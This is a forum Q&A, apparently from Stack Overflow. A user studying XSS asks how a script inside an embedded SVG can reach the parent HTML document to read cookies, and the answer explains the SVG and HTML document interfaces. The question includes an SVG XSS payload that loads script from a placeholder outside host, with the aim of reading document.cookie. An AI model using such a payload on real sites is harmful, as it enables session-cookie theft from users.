# How I can get parent document object From SVG document JavaScript?

Tags: javascript, security, svg, xss, document

I'm studying XSS. I knew that there is vulnerability about HTML SVG object

source is here

```
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0" id="xss"><script type="text/ecmascript" xlink:href="http://blahblahblah.com/~blah/xss/xss.js"></script></svg>
```

I tried this in xss.js

```
alert(document.cookie);
```

but the value of cookie was "undefined"

there is Document object in SVG object but, that's different from HTML Document Object.

Then, How I can get parent Document Object for cookie?

Please Help.

Thanks for reading.

Answer (score 4):

There's a [HTMLDocument](http://www.w3.org/TR/DOM-Level-2-HTML/html.html#ID-26809268) interface and an [SVGDocument](http://www.w3.org/TR/SVG/struct.html#InterfaceSVGDocument) interface, both derive from a base [Document](http://www.w3.org/TR/DOM-Level-2-Core/core.html#i-Document) interface which provides some common methods. Cookies are part of the HTMLDocument interface and so only HTML documents get cookies.

If you're talking about a situation where the `<svg>` is embedded in an html document via an `<object>`, `<embed>` or `<iframe>` tag then `parent.document` or `top.document` will get you the parent html document from a script in the SVG object provided that the SVG and HTML documents are on the same domain.

This works for me on Firefox at least...

```
<html>
  <body>
    <object id="object" data="embedded.svg" type="image/svg+xml"
            width="450" height="300">
    </object>
  </body>
</html>
```

together with embedded.svg

```
<svg xmlns="http://www.w3.org/2000/svg">
  <rect x="0" y="0" width="100%" height="100%" fill="blue"/>
  <script>
    alert(parent.document);
  </script>
</svg>
```

Comment: Thank you for your answer.
but i wondering there are no methods to access parent document object?

Comment: not working.....
i tried console.log(parent.document); and console.log(top.document); , but they show same message "undefined"

SVG and HTML documents are on same domain. same HTML file.